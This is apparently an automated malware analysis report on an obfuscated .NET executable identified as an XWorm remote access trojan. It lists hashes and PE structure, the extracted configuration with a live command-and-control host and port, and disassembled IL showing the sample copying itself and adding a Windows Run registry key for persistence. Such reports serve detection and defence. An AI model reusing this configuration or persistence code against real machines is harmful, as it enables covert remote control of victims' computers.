Malicious

d418bd5723579f39a928e9a4feb33e81

PE Executable | MD5: d418bd5723579f39a928e9a4feb33e81 | Size: 68.61 KB | application/x-dosexec

Characteristics

Symbol Obfuscation Score: Very high

Hash | Hash Value
MD5 | d418bd5723579f39a928e9a4feb33e81
Sha1 | e9f72fa5d1fd1f9dbf355c2f2de4bf1418663977
Sha256 | b956416209869d972fa4e630e662e6f5ec0fdacf1c26a03e290a20a51130e439
Sha384 | 686405d5f2e342f4402663d6dc0ce32f6c838188d0e43a8924b68bdcf8280cfe9cdca471ed0f8010072f6849d9725f18
Sha512 | ef5a362955b9957cacea551407f12b5a1b829482b1b111ef872bca95a89404107ecb4988781b8547e7784ba3ed717cafab3b9b8adf32d543bc1286814bd9b974
SSDeep | 1536:LcITeoGzeEbHqyRPulIqx3bKaSfRng6/O62Ib8:AITHilKxlIwbKaSZpO6fb8
TLSH | E4638D5877E00965D4FEAFB048F22222C734AB13A903EB5F78DC05DD272768989917F6

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Malware Configuration - XWorm config.
Config. Field | Value
Mutex | yrFafqOjWo1AhGTQ
Hosts | 127.0.0.1,been-club.gl.at.ply.gg
Port | 55790
KEY | <1234567890>
USBNM | <Xwormmm>
LoggerPath | %AppData%
family | xworm

Information
Name | Value
Info | PE Detect: PeReader OK (file layout)
Module Name | XWormClient.exe
Full Name | XWormClient.exe
EntryPoint | System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::lGlKNlXWlH1pHIiVjjlWPJQPZw0jltQ2UC9rx()
Scope Name | XWormClient.exe
Scope Type | ModuleDef
Kind | Windows
Runtime Version | v4.0.30319
Tables Header Version | 512
WinMD Version | <null>
Assembly Name | XWormClient
Assembly Version | 1.0.0.0
Assembly Culture | <null>
Has PublicKey | False
PublicKey Token | <null>
Target Framework | <null>
Total Strings | 370
Main Method | System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::lGlKNlXWlH1pHIiVjjlWPJQPZw0jltQ2UC9rx()
Main IL Instruction Count | 164

Main IL

ldsfld System.Int32 PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ER4Ej1tICp4xFZUmggWxOXyyaPejq5vrtEbtjCdU4FzQHBEweNpjVc6xPYlzcfs2TJuyZaK2XNY87rtDjYfwa0fYYZUtveY ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::9kDm0dcvilQovMhjkTq6IpFXCUf4F0HuvMm8ydxIZnRKWQC4cHI2TC3XlcEoRLerD2T7ZgdQc3mHeTWhbRaLBmt11aW1L4x call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::9kDm0dcvilQovMhjkTq6IpFXCUf4F0HuvMm8ydxIZnRKWQC4cHI2TC3XlcEoRLerD2T7ZgdQc3mHeTWhbRaLBmt11aW1L4x ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::OC2EFcYJ7huRVlx6Omzy1gVOV7LxKPwmXq6U31Uj579hhxWZkmKf915J8L7UABw1z4ygHjnUqSJ5vUW520HSXT70Mzp1vhI call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::OC2EFcYJ7huRVlx6Omzy1gVOV7LxKPwmXq6U31Uj579hhxWZkmKf915J8L7UABw1z4ygHjnUqSJ5vUW520HSXT70Mzp1vhI ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::oipLH4fCgOOndxiLx4bZt2e9jTbjCkUxDAT1fjfbiTztvSqlxJvTVbf120shQ20sCHbLPsIwAmFmocZTZCBA5pQzyIoF8aC call System.Object 
Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::oipLH4fCgOOndxiLx4bZt2e9jTbjCkUxDAT1fjfbiTztvSqlxJvTVbf120shQ20sCHbLPsIwAmFmocZTZCBA5pQzyIoF8aC ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::7QTtZvTYXZfuDYA72tnqMtVThbRmGHNQpRHSrPg4IPgbMJ1pVOQ0Lo92oGiWAZsVqqhHSMYqpS2VTpRhcY4lyDyHxLpfFFg call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::7QTtZvTYXZfuDYA72tnqMtVThbRmGHNQpRHSrPg4IPgbMJ1pVOQ0Lo92oGiWAZsVqqhHSMYqpS2VTpRhcY4lyDyHxLpfFFg ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::wvbtfYD5JEP9rjyRAEYh7HP4wmoKQP3EkOQIFEzq7EADJvID2YB7tKTGgziALb94TkYvuyS9uCHavm99MiOc8Wv3kyKf5rc call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::wvbtfYD5JEP9rjyRAEYh7HP4wmoKQP3EkOQIFEzq7EADJvID2YB7tKTGgziALb94TkYvuyS9uCHavm99MiOc8Wv3kyKf5rc ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ZwRX7kWNfFOH1wP7TFeW1hjY1MlAvssghsOQOS5ZeQu0e8ObZy2MLBgG3IPnFabV9pBZjIjDVT5VbjtVSdm8OoGaWrnXFkd call 
System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ZwRX7kWNfFOH1wP7TFeW1hjY1MlAvssghsOQOS5ZeQu0e8ObZy2MLBgG3IPnFabV9pBZjIjDVT5VbjtVSdm8OoGaWrnXFkd ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv ldsfld System.String 
PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::E6sFfwbD0rMSsbNH4GxBoW1HWc6lmnU99tVlhWsXTlB7i8YCTqDaGaUbBRxvhG4eoycm2FWcHIcRJDgBAUMFTd8O9VvUi4d call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::E6sFfwbD0rMSsbNH4GxBoW1HWc6lmnU99tVlhWsXTlB7i8YCTqDaGaUbBRxvhG4eoycm2FWcHIcRJDgBAUMFTd8O9VvUi4d ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::h4BKb2INWcov2CfJZYRWO5Q4khAc9BXTvkGmtIDvuuIYx8Pc0MCHtCMVDeL3OLp5ZScDU0e93ZWSCO1fgmyqraUYwepHSDa call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::h4BKb2INWcov2CfJZYRWO5Q4khAc9BXTvkGmtIDvuuIYx8Pc0MCHtCMVDeL3OLp5ZScDU0e93ZWSCO1fgmyqraUYwepHSDa ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::B42e05YlpSMIplU3oZlp5MZ5oEJcsRUhlZiyUIuoMmLj8K3mJLVi3Bv9Dq4dvGI6ElEkdfv6PXzNcxLginsQyNJ0aiKRJNA call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::B42e05YlpSMIplU3oZlp5MZ5oEJcsRUhlZiyUIuoMmLj8K3mJLVi3Bv9Dq4dvGI6ElEkdfv6PXzNcxLginsQyNJ0aiKRJNA ldsfld 
System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::lO5dfaaAicF9Yq2nJxX9PENxx9VkiomUv5w0kfxrk17VelAIYLCiYqpAW6xheAAGvoKW5zGB6KqBmhQZ9UpiEOA2ua2Eu74 call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::lO5dfaaAicF9Yq2nJxX9PENxx9VkiomUv5w0kfxrk17VelAIYLCiYqpAW6xheAAGvoKW5zGB6KqBmhQZ9UpiEOA2ua2Eu74 ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::zDV1tWz2gAVCLN9avVKFzxrlYZcBSt4VnvKEDdhVurdXQlCLq4hAdMvhSi5ql3C6K8KbE6zRPsHoca9XzY1ltxuhr4fvKQp call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::zDV1tWz2gAVCLN9avVKFzxrlYZcBSt4VnvKEDdhVurdXQlCLq4hAdMvhSi5ql3C6K8KbE6zRPsHoca9XzY1ltxuhr4fvKQp leave.s IL_012F: call System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_012F: call System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() call 
System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() brtrue.s IL_013C: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EleIn09MeBrIgb4zYic7F4UWvNy8yV68lT9Lr() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EleIn09MeBrIgb4zYic7F4UWvNy8yV68lT9Lr() leave.s IL_0152: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0152: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd ldstr \ ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String 
System.IO.DirectoryInfo::get_FullName() stloc.s V_5 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0199: ldloc.0 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_01B0: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_6 ldloc.s V_6 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::t67BSKtqIOXnXocMIo1P7eUiqjGLHbBOzsxEMufyHeRjytviDDOoWmbHjVhjIpSr6QLYE call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01DB: call My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01DB: call My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() call 
My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_0216: call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0216: call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() ldnull <null> ldftn System.Void 
Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::bSERuEIx4LoGS2N4owx7FCYhOZF9dMKOSmdef() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::oIjOmuxXL2CscGJB8diAvJpTGE6ZeSyIzwfuT() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.ygrTwjprA3WB8o3n6QhIZAJZtRSDZkUUrNkUa::J5NRYsTdAcOHg731zTdNtjIpD5sHE9PUXxM0P() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0258: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::Ut6lF3SV5jYUPJxCOXVkwbUYF07lTlrERnvsR() call System.Void Stub.YgViWqfb1qmddYsn3NWlJ9reDmNNojlhdoBfm::DXwOHkGFlDFxZTgXlbd9WmhGeR4ac1zAI03aF() call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::Ut6lF3SV5jYUPJxCOXVkwbUYF07lTlrERnvsR() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::A594cDxv0Up1xfMlQDrwTzMCcuACP0owrYaiN() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EFnhamSkxRZi9It340U5wQeLXHBOuJ1qHbiEm() newobj System.Void 
System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>

